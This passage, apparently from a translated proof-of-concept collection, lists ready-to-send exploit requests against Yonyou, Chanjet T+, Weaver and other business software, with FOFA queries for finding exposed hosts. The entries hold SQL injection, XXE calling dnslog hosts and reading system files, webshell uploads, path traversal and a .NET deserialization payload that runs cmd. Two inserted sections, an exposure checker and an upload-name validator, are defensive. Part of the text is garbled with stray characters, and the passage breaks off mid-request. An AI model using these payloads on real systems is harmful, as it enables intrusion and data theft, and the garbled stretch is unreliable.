Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Uploaded file is then served at:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Affected versions: <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Affected versions: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Affected version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

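Entries 26, 27 and 29 to 34 all rest on the same primitive: a request parameter is concatenated into a query, and the only confirmation is a database sleep (waitfor delay on SQL Server, DBMS_PIPE.RECEIVE_MESSAGE on Oracle). Later entries on this page (39, 41, 43, 44, 46, 51, 57, 58) use the same two primitives. The script below is an added example for defenders checking their own hosts; it is not code from the original post or from Yonyou. It measures a benign baseline and an injected request for each NC endpoint above and reports exposure only when most of the requested delay appears on top of the median baseline. The base URL, the short sleep used in the offline demo and the simulated target are assumptions; urllib_sender is for an authorized check against a real host.

```python
"""Time-based blind SQL injection exposure check for the Yonyou NC endpoints in
entries 26-34. Added example, not code from the original post or from Yonyou.
The paths and parameters are the ones the POCs hit; the benign value, the
threshold and the simulated target are constructed here. `send` is injected so
the logic runs offline; `urllib_sender` is for an authorized live check."""
import statistics
import time
import urllib.error
import urllib.request
from typing import Callable
from urllib.parse import quote

Sender = Callable[[str], None]

# (entry, URL template). {p} receives the URL-encoded test value.
TIME_BASED_CHECKS = [
    ("26 linkVoucher", "/portal/pt/yercommon/linkVoucher?pageId=login&pkBill={p}"),
    ("27 showcontent", "/ebvp/infopub/showcontent?id={p}"),
    ("29 down/bill", "/portal/pt/erfile/down/bill?pageId=login&id={p}"),
    ("31 runStateServlet", "/portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk={p}"),
    ("32 complainbilldetail", "/ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint={p}"),
    ("33 downTax/download", "/portal/pt/downTax/download?pageId=login&classid={p}"),
    ("34 warningDetailInfo", "/ebvp/infopub/warningDetailInfo?pageId=login&pkMessage={p}"),
]
BENIGN = "1"


def payload_for(backend: str, delay: float) -> str:
    """Delay primitive per database, in the form the POCs above use. Pick the one
    matching the instance's backend: the wrong primitive never sleeps, so a
    clean result with the wrong one proves nothing."""
    if backend == "mssql":
        return f"1'waitfor delay '0:0:{delay}'--"
    if backend == "oracle":
        return f"1' AND 4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),{delay})--"
    raise ValueError(f"unknown backend {backend!r}")


def timed(send: Sender, url: str) -> float:
    t0 = time.perf_counter()
    send(url)
    return time.perf_counter() - t0


def median_latency(send: Sender, url: str, samples: int) -> float:
    return statistics.median(timed(send, url) for _ in range(samples))


def check_endpoint(send: Sender, base: str, template: str, backend: str,
                   delay: float = 5.0, samples: int = 3) -> tuple[bool, float, float]:
    """Return (injectable, baseline_s, injected_s).

    Medians over several samples on each side absorb ordinary jitter on a slow ERP
    host; the verdict needs most of the requested delay on top of the benign
    baseline, not merely 'slower than before'."""
    benign_url = base + template.format(p=quote(BENIGN, safe=""))
    inject_url = base + template.format(p=quote(payload_for(backend, delay), safe=""))
    baseline = median_latency(send, benign_url, samples)
    injected = median_latency(send, inject_url, samples)
    return injected - baseline >= 0.8 * delay, baseline, injected


def run_checks(send: Sender, base: str, backend: str = "mssql",
               delay: float = 5.0, samples: int = 3) -> list[tuple[str, bool, float, float]]:
    return [(entry, *check_endpoint(send, base, tmpl, backend, delay, samples))
            for entry, tmpl in TIME_BASED_CHECKS]


def urllib_sender(timeout: float = 30.0) -> Sender:
    """Live sender for an authorized test. Keep the timeout above the delay or a
    time-out gets measured instead of the sleep; HTTP error responses still
    carry the server-side timing, so they are swallowed rather than raised."""
    def send(url: str) -> None:
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                resp.read()
        except urllib.error.URLError:
            pass
    return send


def simulated_sender(delay: float, vulnerable: bool) -> Sender:
    """Constructed stand-in for a target: sleeps only when a delay primitive
    arrives and the simulated host is marked vulnerable."""
    def send(url: str) -> None:
        if vulnerable and ("waitfor" in url or "DBMS_PIPE" in url):
            time.sleep(delay)
    return send


if __name__ == "__main__":
    # Offline demonstration against the simulated host; 0.2 s keeps it quick.
    for entry, hit, base_s, inj_s in run_checks(simulated_sender(0.2, True),
                                                "http://nc.example", "oracle", delay=0.2):
        print(f"{entry:24} injectable={hit} baseline={base_s:.3f}s injected={inj_s:.3f}s")
```

The POCs write the space inside the payload as `+`; `quote` emits `%20`, which the servlet container decodes identically. Run the check with the primitive for the backend the instance actually uses, and treat a response that arrives after the timeout as inconclusive rather than as a hit.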
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8 Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Follow-up request:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Moz
illa/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
<soapenv:Body>
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
</ser:getUserNameById>
</soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud (政府财务云) arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file is then served at:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

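Entries 24, 28, 35, 42, 48 and 49 above (and 61 later on this page) share one root cause: the upload handler trusts a name the client controls, whether a filename carrying path components (`./webapps/nc_web/1.jsp`), a separate form field (`fname`), a query parameter that picks the extension (`fileType=jsp`), or a name with a trailing space (`s.php `, which Windows stores as `s.php`). The validator below is an added example for anyone hardening such a handler; it is not code from the original post or from any of the vendors. It rejects every one of those names and returns only an extension, from which the server then builds its own on-disk name. The allowlist, the upload root and the legitimate sample names are assumptions; the hostile sample names are taken from the requests above.

```python
"""Server-side file-name validation for upload handlers, checked against the names the
upload POCs on this page submit. Added example, not code from the original post or any
vendor. ALLOWED_EXTENSIONS, UPLOAD_ROOT and the legitimate sample names are assumptions."""
import posixpath
import re
import uuid
from os.path import commonpath, join, realpath

# Assumption: what this particular endpoint legitimately accepts.
ALLOWED_EXTENSIONS = {"txt", "pdf", "png", "jpg", "jpeg", "xlsx"}
# Must never appear anywhere in the name, even as an inner part (shell.jsp.txt).
EXECUTABLE_EXTENSIONS = {"jsp", "jspx", "jspf", "php", "php3", "php5", "phtml", "phar",
                         "asp", "aspx", "ashx", "asmx", "cer", "htaccess", "sh", "exe"}
NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}")
UPLOAD_ROOT = "/var/app/uploads"  # assumption


class RejectedUpload(ValueError):
    pass


def validate_upload_name(raw: str) -> str:
    """Validate a client-supplied file name and return its lower-cased extension.

    Anything a handler should never save is rejected rather than 'repaired': every
    repair (stripping dots, replacing slashes) is a bypass waiting to happen."""
    if "\x00" in raw:
        raise RejectedUpload("NUL byte")                       # a.txt\x00.jsp
    name = raw.replace("\\", "/")
    if name in ("", ".", "..") or name != posixpath.basename(name):
        raise RejectedUpload("path component")                 # ./webapps/nc_web/1.jsp, M\webapps\...
    if name != name.strip() or name.endswith("."):
        raise RejectedUpload("leading/trailing space or dot")  # "s.php " becomes s.php on Windows
    if not NAME_RE.fullmatch(name):
        raise RejectedUpload("disallowed characters")          # "%s.php", "a;b.jsp", control chars
    parts = name.lower().split(".")
    if len(parts) < 2:
        raise RejectedUpload("no extension")
    *inner, ext = parts[1:]
    if ext not in ALLOWED_EXTENSIONS:
        raise RejectedUpload(f"extension .{ext} not allowed")  # 2fiu...jsp, 1.jsp
    if any(p in EXECUTABLE_EXTENSIONS for p in inner):
        raise RejectedUpload("executable inner extension")     # shell.jsp.txt
    return ext


def storage_path(ext: str, root: str = UPLOAD_ROOT) -> str:
    """Server-chosen on-disk name. The client name is metadata only, never a path, and
    the extension comes from validate_upload_name, never from a request parameter such
    as fileType=jsp (entry 28) or a form field such as fname (entry 24)."""
    path = join(root, f"{uuid.uuid4().hex}.{ext}")
    if commonpath([realpath(root), realpath(path)]) != realpath(root):
        raise RejectedUpload("escaped upload root")
    return path


def verdict(raw: str) -> str:
    """'ok:<ext>' or 'rejected:<reason>', for audits and tests."""
    try:
        return "ok:" + validate_upload_name(raw)
    except RejectedUpload as exc:
        return "rejected:" + str(exc)


# Constructed sample set: two legitimate names, then the names the POCs above submit.
SAMPLE_NAMES = [
    "report.pdf", "Photo.JPG",
    "./webapps/nc_web/1.jsp",                                # entry 35
    "M\\webapps\\nc_web\\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp",   # entry 24, fname field
    "2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp",                       # entry 28
    "s.php ", "%s.php ",                                     # entries 48, 49
    "8uxssX66eqrqtKObcVa0kid98xa.jsp",                       # entry 61
    "shell.jsp.txt", "a.txt\x00.jsp", "..",
]

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        print(f"{n!r:55} -> {verdict(n)}")
    print(storage_path("pdf"))
```

Keep the extension allowlist per endpoint rather than global, and store uploads outside any directory the application server executes from; the validator stops the names on this page, but a `.jsp` that can never be written into `nc_web` is the stronger guarantee.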
50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong social commerce ERP (云时空社会化商业ERP) validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office (泛微E-Office) json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

3 d( H+ C. @% S; P53. 迪普 DPTech VPN Service 任意文件上传9 B6 }& h& d& x+ K( Q
FOFA:app="DPtech-SSLVPN"1 T& Y! P: C' C; j9 c1 S C
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
8 B a6 |0 M6 ~! N+ }4 v. U0 U* p! |& Q( p2 B) \, H% F
( `+ j2 }" L P/ }1 F/ B% B54. 畅捷通T+ getstorewarehousebystore 远程代码执行8 T' N7 c* c" i: h2 a( k
FOFA:app="畅捷通-TPlus"4 y W& w! T/ Y X, b1 J" f6 O
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
3 E* Z4 t" ]7 y; f- C$ J"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"% P7 h7 z0 l7 T. a q8 G, H
3 d0 h) x# U! W8 Y
! F' d& S! ?( N: f完整数据包
! b4 E z- J+ i- n+ uPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.16 n" N, o. a2 R( G8 j+ c7 t
Host: x.x.x.x
2 r" O4 y$ e0 v# aUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
' s0 v: I% }/ y1 n8 \( uContent-Length: 593+ Y- j8 L6 x* M2 P) T8 g5 e
$ [- u0 n. p$ r! d E
{
4 O4 R- U$ i' s7 F"storeID":{/ N4 x8 {2 |( z( _5 }3 B% Y; f
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",; ~* Y# I1 h3 D/ n3 ]
"MethodName":"Start",
; W, o5 b$ U4 X0 B* g "ObjectInstance":{7 `. q0 D0 c, P/ d7 E9 @$ [4 K
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 l/ C) V. {3 d j. w
"StartInfo":{
2 \6 t* c5 u1 G+ C* e "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 c; H4 `; @ E; [( N3 R "FileName":"cmd",8 y5 O3 ]- p1 q9 n
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt", P# U) F7 c/ `
}& ~2 S7 V. f: j
}5 ~( i, O9 B" z; j6 a
}
: {. h7 p& A6 K: ~}
; W; w5 a j3 n! ~% n4 g) w
% F R7 S Y/ P4 L
3 V k: Q8 L/ }/ A第二步,访问如下url( Z$ I' |7 p8 c, U4 c9 }
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
K4 i8 E, x2 t" k/ c/ Q
' E8 ?/ O/ C t1 Z1 a+ K
55. Chanjet T+ GetDecAllUsers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA:app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
